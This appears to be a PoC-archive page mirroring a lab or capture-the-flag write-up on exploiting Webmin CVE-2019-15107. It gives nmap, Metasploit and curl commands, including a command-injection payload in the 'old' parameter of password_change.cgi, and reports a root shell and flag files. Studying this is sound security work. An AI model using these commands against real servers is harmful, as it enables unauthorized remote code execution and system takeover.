Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-15107 PoC — Webmin 命令操作系统命令注入漏洞

Source
https://github.com/ArtemCyberLab/Project-Exploitation-of-Webmin-Authentication-Vulnerability
Associated Vulnerability
Title:Webmin 命令操作系统命令注入漏洞 (CVE-2019-15107)
Description:An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
Description
Research Objective: To conduct a comprehensive analysis and successful exploitation of a Remote Code Execution (RCE) vulnerability in Webmin version 1.890 (CVE-2019-15107), ultimately gaining full control over the target system.
Readme
Research Objective:
To conduct a comprehensive analysis and successful exploitation of a Remote Code Execution (RCE) vulnerability in Webmin version 1.890 (CVE-2019-15107), ultimately gaining full control over the target system.

Methodology:

Initial Reconnaissance:

Network scanning performed using Nmap:

bash
nmap -sV -sC -A -p- 10.201.105.185
Identified Webmin 1.890 service running on port 10000

Vulnerability Analysis:

Investigated the vulnerability mechanism in password_change.cgi

Confirmed the possibility of unauthenticated arbitrary command execution

Exploitation:

Implemented two attack vectors:

Using Metasploit Framework:

bash
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit
Manual exploitation via curl:

bash
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"
Post-Exploitation:

Obtained interactive root shell

Conducted filesystem analysis

Discovered flag files:

bash
/home/dark/user.txt
/root/root.txt
Findings:

Successfully exploited CVE-2019-15107 vulnerability

Gained complete root privileges on the system

Demonstrated critical importance of timely software updates

Technical Conclusions:

Vulnerability allows arbitrary command execution via "old" parameter injection

Lack of authentication checks makes this particularly dangerous

Version 1.890 contains a backdoor patched in later releases

Security Recommendations:

Immediate upgrade to current Webmin version

Restrict management panel access by IP

Regular security audits of web applications

Further Research Directions:

Analysis of other Webmin vulnerabilities

Development of custom exploit without Metasploit

Investigation of persistence techniques in compromised systems

This case study demonstrates the critical importance of timely system updates and the necessity for continuous vulnerability monitoring in deployed software. The research provides practical insights into modern web application exploitation techniques while emphasizing fundamental security principles.
File Snapshot

 [4.0K]  /data/pocs/c80c381b7c6bbc5a84282fbc8214e6dddede9f22
├── [227K]  1.jpeg
├── [ 71K]  2.jpeg
├── [149K]  3.jpeg
├── [176K]  4.jpeg
├── [179K]  5.jpeg
├── [157K]  6.jpeg
└── [2.0K]  README.md

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →